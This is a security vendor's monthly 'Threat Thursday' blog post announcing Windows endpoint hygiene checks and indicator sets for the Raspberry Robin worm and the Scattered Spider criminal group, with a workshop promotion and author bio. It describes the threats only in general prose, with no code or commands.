Threat Thursday

Threat Thursday: February

Written by Trey Bilbrey | Feb 22, 2024 11:17:37 PM

This Threat Thursday delves into windows endpoint cyber hygiene, the worm-like malware Raspberry Robin & the cybercriminal group Scattered Spider.

New Threat Releases

Windows Endpoint Hygiene

As we dive into the realm of cyber hygiene for Windows endpoints, we will explore 15 essential STIG CAT I checks designed to fortify the security posture of your endpoints, ranging from validating antivirus configurations to ensuring robust authentication levels for Windows Remote Management. This release has been given to all SCYTHE customers so check it out in the knowledge base and see where your endpoint hygiene stacks up.

Empower IOC Releases

This month we wanted to highlight two of the four IOC sets we have created for Empower subscribers pertaining to the malware variant Raspberry Robin and the cybercriminal group Scattered spider. Both Raspberry Robin and Scattered Spider have been gaining traction recently with an uptick of compromises attributed to them. 

Raspberry Robin

Raspberry Robin continues to serve as a significant attack vector and has more recently been identified as a precursor to Ransomware Campaigns. Raspberry Robin, discovered in 2021 by Red Canary, is a worm-like malware that often utilizes external drives, such as USB, as its initial vector.  Raspberry Robin has since evolved to a widely distributed malicious downloader, and is often seen as a precursor to ransomware attacks!  Once plugged in, the malware executes commands to download and install a malicious DLL via Windows Installer, using various evasion techniques to escalate privileges and bypass User Access Control. This DLL facilitates a range of malicious activities including C2 communication, process creation for possible persistence, and downloading additional payloads. 


Scattered Spider

Scattered Spider is a cybercriminal Group, also known as UNC3944, Storm-0875, LUCR-3, Octo Tempest, Roasted Oktapus, and Scatter Swine. They utilize their access to victim companies, to then target the 3rd-party companies of the original victim companies. Recently, they have been observed deploying ransomware to victim networks, notably an ALPHV ransomware as recently as April 2023. Scattered Spider is rapidly gaining notoriety and emerging as Cybercriminal group that demands close attention in the cybersecurity landscape.

SCYTHE has included Scattered Spider Cybercriminal Group IOCs in the form of a threat, for use in your SCYTHE Platform, as well as Sigma rules to aid in the detection of Scattered Spider.  

Want to learn more about what SCYTHE's Empower offering can do for you? Reach out to us here

March 26 Free Virtual Workshop - Detection Engineering

Register today! Register today! Learn the detection engineering process in this FREE three-hour workshop with Lead Adversary Emulation Engineer Trey Bilbrey. After going over each step of the cycle, we will dive into a hands-on workshop to put the method to practical use.

Save The Date for UniCon & SCYTHE Events

Save the date(s) for upcoming events featuring SCYTHE experts. Click here to see the full lineup! 

About the Author

Trey Bilbrey is a Lead Adversary Emulation Engineer at SCYTHE, specializing in Purple Team Exercises, Threat Emulation, Critical Infrastructure, and holistic cyber operations. Trey's 15 years of industry experience has allowed him to become an excellent educator, defender of networks, and a cultivator of cybersecurity professionals. Prior to joining SCYTHE, Trey held positions at notable organizations such as Hack The Box (HTB Academy content Developer), The Army Corps of Engineers (ICS/SCADA Penetration Testing), and a veteran of the United States Marine Corps ( Defensive and Offensive Cyber Operations). Current certifications include the CISSP, GICSP, GCIP, and K>FiveFour RTAC.

About SCYTHE

SCYTHE represents a paradigm shift in cybersecurity risk management, empowering organizations to Attack, Detect, and Respond efficiently. The SCYTHE platform enables collaboration between red, blue, and purple teams to build and emulate real-world adversarial campaigns. SCYTHE's innovative dual-deployment options and comprehensive features ensure a proactive cybersecurity approach. Headquartered in Arlington, VA, SCYTHE is privately funded by distinguished partners dedicated to shaping a more resilient cybersecurity landscape.